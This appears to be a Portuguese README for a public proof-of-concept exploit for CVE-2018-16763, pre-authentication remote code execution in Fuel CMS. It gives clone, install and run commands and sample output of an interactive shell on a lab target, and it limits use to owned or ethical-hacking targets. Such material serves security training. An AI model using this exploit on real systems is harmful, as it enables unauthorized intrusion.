
Um exploit de Prova de Conceito (PoC) para CVE-2018-16763 (Fuel CMS - Execução Remota de Código Pré-autenticada).
Um exploit de Prova-de-Conceito (PoC) para CVE-2018-16763 (Fuel CMS - Execução Remota de Código Pré-autenticada).
Este programa Python 3 serve como uma PoC para a vulnerabilidade CVE-2018-16763 no sistema de gerenciamento de conteúdo Fuel CMS. Especificamente, a vulnerabilidade permite a Avaliação de Código PHP através do parâmetro pages/select/filter (implementado nesta PoC), levando à Execução Remota de Código Pré-autenticada, uma vulnerabilidade crítica do sistema.
git clone https://github.com/saccles/CVE-2018-16763-Proof-of-Concept.git
cd CVE-2018-16763-Proof-of-Concept
python3 -m pip install -r requirements.txt
Execute o script de exploit contra um alvo vulnerável. (EXECUTE O SCRIPT APENAS CONTRA UM ALVO QUE VOCÊ POSSUI OU UM ALVO FORNECIDO POR TryHackMe, HackTheBox OU OUTRO SITE DE HACKING ÉTICO!) Eu recomendaria conferir o Desafio "Ignite" do TryHackMe para mais detalhes. Você também pode baixar a aplicação Fuel CMS vulnerável do exploit-db.com.
python3 CVE-2018-16763.py -u URL
[DEBUG] Connecting to http://10.10.60.46 ...
[DEBUG] Succesfully connected!
Enter Command:
$ ls -la
total 52
drwxrwxrwx 4 root root 4096 Jul 26 2019 .
drwxr-xr-x 3 root root 4096 Jul 26 2019 ..
-rw-r--r-- 1 root root 163 Jul 26 2019 .htaccess
-rwxrwxrwx 1 root root 1427 Jul 26 2019 README.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 assets
-rwxrwxrwx 1 root root 193 Jul 26 2019 composer.json
-rwxrwxrwx 1 root root 6502 Jul 26 2019 contributing.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 fuel
-rwxrwxrwx 1 root root 11802 Jul 26 2019 index.php
-rwxrwxrwx 1 root root 30 Jul 26 2019 robots.txt
python3 CVE-2018-16763.py -h
usage: CVE-2018-16763.py [-h] -u URL
This tool exploits CVE-2018-16763 on Fuel CMS.
options:
-h, --help show this help message and exit
-u URL, --url URL Fuel CMS url.
Silas Accles [saccles]
Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE.md para detalhes.
Fortemente inspirado por programas do Exploit-DB, scripts PoC de Vozec e a PoC original desenvolvida por Padsala Trushal.